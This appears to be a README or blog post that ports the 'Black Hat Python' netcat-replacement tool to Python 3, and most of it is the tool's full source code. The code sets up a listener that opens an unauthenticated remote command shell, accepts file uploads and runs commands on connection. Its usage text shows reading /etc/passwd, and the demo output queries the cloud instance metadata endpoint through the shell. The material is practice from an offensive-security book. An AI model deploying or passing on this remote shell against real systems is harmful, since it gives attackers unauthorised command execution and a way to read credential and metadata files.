This project is a starting point for networking tweak with python3. I found there are quite a good tutorial and books around python2 regarding network wrangling, but I thought lots of them are not updated for the use with python3. At first, I just made a small modification of netcat on python2, and made it run with python3.
$ python3 bhpnet.py -t localhost -p 9999 <BHP:#> pwd /home/ec2-user/environment/blackhat <BHP:#> curl http://169.254.169.254/latest/meta-data/local-ipv4 <BHP:#> % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 12 100 12 0 0 10869 0 --:--:-- --:--:-- --:--:-- 12000 172.31.1.207 <BHP:#>
Here is the code:
# this is the practice from "Blackk Hat Python" import sys import socket import getopt import threading import subprocess listen = False command = False upload = False execute = "" target = "" upload_destination = "" port = 0 def usage(): print("BHP Net Tool\n" "\n" "Usage: bhpnet.py -t target_host -p port\n" "-l --listen - listen on [host]:[port] for incoming connections\n" "-e --execute=file_to_run - execute the given file upon receiving a connection\n" "-c --command - initialize a command shell\n" "-u --upload=destination - upon receiving connection upload file and write to [destination]\n" "\n" "Example: " "bhpnet.py -t 192.168.0.1 -p 5555 -l -c\n" "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe\n" "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"\n" "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135\n" ) sys.exit(0) def main(): global listen global port global execute global command global upload_destination global target if not len(sys.argv[1:]): usage() try: opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu", ["help", "listen", "execute", "target", "port", "command", "upload"]) except getopt.GetoptError as err: print(str(err)) usage() for o,a in opts: if o in ("-h", "--help"): usage() elif o in ("-l", "--listen"): listen = True elif o in ("-e", "--execute"): execute = a elif o in ("-c", "--commandshell"): command = True elif o in ("-u", "--upload"): upload_destination = a elif o in ("-t", "--target"): target = a elif o in ("-p", "--port"): port = int(a) else: assert False, "Unhandled Option" # are we going to listen or just send data from stdin? if not listen and len(target) and port > 0: # read in the buffer from the commandline # this will block, so send CTRL-D if not sending input # to stdin buffer = sys.stdin.buffer.read() # send data off client_sender(buffer) # we are going to listen and potentially upload things, execute commands, and drop a shell back # depending on our command line options above if listen: server_loop() def client_sender(buffer): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # connect to our target host client.connect((target, port)) if len(buffer): client.send(buffer) while True: # now wait for data back recv_len = 1 response = b"" while recv_len: data = client.recv(4096) recv_len = len(data) response += data if recv_len < 4096: break print(str(response, 'utf-8'), end="") # wait for more input buffer = input("").encode('utf-8') buffer += b"\n" # send it off client.send(buffer) except: print("[*] Exception! Exiting.") # tear down the connection client.close() def server_loop(): global target # if no target is defined, we listen on all interfaces if not len(target): target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((target, port)) server.listen(5) while True: client_socket, addr = server.accept() # spin off a thread to handle our new client client_thread = threading.Thread(target=client_handler, args=(client_socket,)) client_thread.start() def run_command(command): # trim the newline command = command.rstrip() # run the command and get the output back try: output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True) except: output = "Failed to execute command.\r\n" # send the output back to the client return output def client_handler(client_socket): global upload global execute global command # check for upload if len(upload_destination): # read in all of the bytes and write to our destination file_buffer = "" # keep reading data until none is available while True: data = client_socket.recv(1024) if not data: break else: file_buffer += data # now we take these bytes and try to write them out try: file_descriptor = open(upload_destination, "wb") file_descriptor.write(file_buffer) file_descriptor.close() # acknowledge that we wrote the file out client_socket.send(b"Successfully saved file to %s\r\n" % upload_destination) except: client_socket.send(b"Failsed to save file to %s\r\n" % upload_destination) # check for command execution if len(execute): # run the command output = run_command(execute) client_socket.sendall(output) # now we go into another loop if a command shell was requested if command: while True: # show a simple prompt client_socket.send(b"<BHP:#> ") # now we receive until we see a linefeed cmd_buffer = b"" while b"\n" not in cmd_buffer: cmd_buffer += client_socket.recv(1024) # send back the command output response = run_command(cmd_buffer) # send back the response client_socket.send(response) main()